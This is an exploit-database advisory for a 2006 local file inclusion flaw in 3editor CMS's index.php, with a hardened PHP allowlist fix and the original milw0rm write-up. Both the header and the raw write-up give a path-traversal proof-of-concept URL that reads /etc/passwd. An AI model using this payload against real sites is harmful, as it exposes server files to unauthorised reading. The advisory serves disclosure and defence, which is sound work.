Vendor: 3editor CMS
By: Dr Max Virus
CVSS: 7.5 (HIGH)
Vulnerability type: Local File Include
CWE: 98
Product Name: 3editor CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

3editor CMS (index.php) Local File Include Exploit

In index.php the `page` parameter is passed to include() without sanitization, allowing an attacker to exploit the vulnerability when register_globals is set to on. The PoC example is http://[target]/[path]/index.php?page=../../../../../etc/passwd.

Mitigation:

Sanitize user input and ensure that register_globals is set to off.
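The vulnerable line in index.php includes `'phplib/' . $_GET['page']` unchecked. Below is an added example, not 3editor's own code, of a hardened replacement that accepts only allowlisted page names and additionally confines the resolved path to phplib/; it assumes page files live in phplib/ beside index.php and uses treeedit.php (the only page name the advisory mentions) as a placeholder allowlist.

```php
<?php
// Added example (not 3editor's code): hardened replacement for the
// include in index.php. Only names from a fixed allowlist are ever
// included, and the resolved path must stay inside phplib/.

// Assumed layout: page files live in phplib/ next to this script.
define('PAGE_DIR', __DIR__ . '/phplib');

// Allowlist of page names the application actually ships.
// treeedit.php is the only name on the advisory; extend as needed.
const ALLOWED_PAGES = ['treeedit.php'];

function resolve_page(?string $requested): string
{
    // Default page, matching the original behaviour when ?page is absent.
    if ($requested === null || $requested === '') {
        return 'treeedit.php';
    }
    // Strict comparison: the request must be exactly an allowlisted name,
    // so "../../../../../etc/passwd" or "treeedit.php\0" never passes.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        http_response_code(404);
        exit('unknown page');
    }
    return $requested;
}

function safe_include(string $page): void
{
    $real = realpath(PAGE_DIR . '/' . $page);
    $base = realpath(PAGE_DIR);
    // Defence in depth: even an allowlisted name must resolve to a real
    // file under phplib/ (realpath normalises any ".." components).
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(404);
        exit('unknown page');
    }
    include $real;
}

// Note: the original line reads $_GET['page'] directly, so the include is
// reachable with register_globals off too; the fix belongs in the code,
// not only in php.ini.
safe_include(resolve_page($_GET['page'] ?? null));
```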

Exploit-DB raw data:

************************************************************************     
*script Name: 3editor CMS (index.php) Local File Include Exploit       *
*Download:http://www.matteolucarelli.net/3editor/index.htm             *
*[Author      : Dr Max Virus                                           *
*[Contact     :drmaxvirus@w.cn                                         *
************************************************************************
*Bug & Problem                                                         *
*In file index.php Let's Take a look;                                  *
*if (!isset($_GET['page'])) include('phplib/treeedit.php');            *
*else include('phplib/'.$_GET['page']);                                *
************************************************************************
*As We can see the variable of page is not sanitized So attacker can   *
*apply his bug when:                                                   *
*register_globals=on                                                   *
************************************************************************
*POC Example:                                                          *
*http://[target]/[path]/index.php?page=../../../../../etc/passwd       *
************************************************************************
*Thx:str0ke -koray -ajann -Timq -r0ut3r -All my Friends                *
*special gr33ts:AsianEagle -The master -Kacper -Hotturk                *
************************************************************************

# milw0rm.com [2006-12-22]